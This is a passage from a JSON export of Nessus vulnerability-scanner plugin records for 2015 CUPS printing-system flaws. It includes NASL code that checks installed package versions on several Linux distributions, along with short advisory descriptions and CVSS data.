reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-debuginfo-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-debuginfo / cups-devel / cups-filesystem / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:07:20", "references": ["https://alas.aws.amazon.com/ALAS-2015-559.html"], "pluginID": "84595", "description": "A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)", "edition": 5, "reporter": "Tenable", "published": "2015-07-08T00:00:00", "title": "Amazon Linux AMI : cups (ALAS-2015-559)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:cups-devel", "p-cpe:/a:amazon:linux:cups-libs", "p-cpe:/a:amazon:linux:cups", "p-cpe:/a:amazon:linux:cups-php", "p-cpe:/a:amazon:linux:cups-lpd", "p-cpe:/a:amazon:linux:cups-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-559.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84595", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-559.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84595);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"ALAS\", value:\"2015-559\");\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"Amazon Linux AMI : cups (ALAS-2015-559)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update cups' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"cups-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-debuginfo-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-devel-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-libs-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-lpd-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-php-1.4.2-67.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-debuginfo / cups-devel / cups-libs / cups-lpd / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:02:50", "references": ["https://security.gentoo.org/glsa/201510-07"], "pluginID": "86692", "description": "The remote host is affected by the vulnerability described in GLSA-201510-07 (CUPS: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in cups. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "edition": 4, "reporter": "Tenable", "published": "2015-11-02T00:00:00", "title": "GLSA-201510-07 : CUPS: Multiple vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-11-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:cups"], "id": "GENTOO_GLSA-201510-07.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201510-07.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86692);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2015/11/02 14:33:25 $\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"GLSA\", value:\"201510-07\");\n\n script_name(english:\"GLSA-201510-07 : CUPS: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201510-07\n(CUPS: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in cups. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201510-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CUPS users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-print/cups-2.0.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-print/cups\", unaffected:make_list(\"ge 2.0.3\"), vulnerable:make_list(\"lt 2.0.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CUPS\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:57:05", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1221642", "https://bugzilla.redhat.com/show_bug.cgi?id=1221641", "http://www.nessus.org/u?a751aa69"], "pluginID": "84310", "description": "New upstream bug-fix release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2015-06-22T00:00:00", "title": "Fedora 22 : cups-2.0.3-1.fc22 (2015-9726)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-10-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:cups", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-9726.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84310", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9726.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84310);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:22:35 $\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"FEDORA\", value:\"2015-9726\");\n\n script_name(english:\"Fedora 22 : cups-2.0.3-1.fc22 (2015-9726)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New upstream bug-fix release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221642\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160444.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a751aa69\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"cups-2.0.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:57:20", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1221642", "https://bugzilla.redhat.com/show_bug.cgi?id=1221641", "http://www.nessus.org/u?dda586f0"], "pluginID": "84311", "description": "This update fixed 2 security flaws.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2015-06-22T00:00:00", "title": "Fedora 21 : cups-1.7.5-17.fc21 (2015-9801)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-10-19T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:cups"], "id": "FEDORA_2015-9801.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84311", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9801.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84311);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:22:35 $\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"FEDORA\", value:\"2015-9801\");\n\n script_name(english:\"Fedora 21 : cups-1.7.5-17.fc21 (2015-9801)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixed 2 security flaws.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221642\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dda586f0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"cups-1.7.5-17.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:41:50", "references": ["https://packages.debian.org/source/jessie/cups", "https://www.debian.org/security/2015/dsa-3283", "https://packages.debian.org/source/wheezy/cups"], "pluginID": "84063", "description": "It was discovered that CUPS, the Common UNIX Printing System, is vulnerable to a remotely triggerable privilege escalation via cross-site scripting and bad print job submission used to replace cupsd.conf on the CUPS server.", "edition": 5, "reporter": "Tenable", "published": "2015-06-10T00:00:00", "title": "Debian DSA-3283-1 : cups - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:cups", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3283.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84063", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3283. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84063);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/11/10 11:49:37\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"DSA\", value:\"3283\");\n\n script_name(english:\"Debian DSA-3283-1 : cups - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that CUPS, the Common UNIX Printing System, is\nvulnerable to a remotely triggerable privilege escalation via\ncross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/cups\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/cups\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3283\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cups packages.\n\nFor the oldstable distribution (wheezy), these problems have been\nfixed in version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 1.7.5-11+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"cups\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"cups-bsd\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"cups-client\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"cups-common\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"cups-dbg\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"cups-ppdc\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"cupsddk\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcups2\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcups2-dev\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupscgi1\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupscgi1-dev\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsdriver1\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsdriver1-dev\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsimage2\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsimage2-dev\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsmime1\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsmime1-dev\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsppdc1\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcupsppdc1-dev\", reference:\"1.5.3-5+deb7u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-bsd\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-client\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-common\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-core-drivers\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-daemon\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-dbg\", 